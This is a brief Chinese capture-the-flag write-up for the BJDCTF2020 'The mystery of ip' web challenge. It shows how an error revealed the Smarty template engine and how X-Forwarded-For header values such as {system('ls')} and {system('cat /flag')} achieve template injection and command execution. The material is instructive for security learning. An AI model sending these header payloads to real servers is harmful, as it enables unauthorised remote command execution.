[BJDCTF2020]The mystery of ip.md

首页长这样

首页有一串js

好家伙，炫酷的打字效果往往只需要最朴素的编写方式，学到了（然而好像和题目没啥关系）

/flag.php

很奇怪，这好像是个内网ip，应该是过了代理

猜测可修改X-Forwarded-For来控制回显

先瞎打一波看看有没有报错

X-Forwarded-For: '{\%*asfo

通过报错确定服务端使用Smarty作为模板引擎

Smarty语法好像是基于php，尝试使用php的system函数

X-Forwarded-For: {system('ls')}

X-Forwarded-For: {system('cat /flag')}

#Web #PHP #SSTI #smarty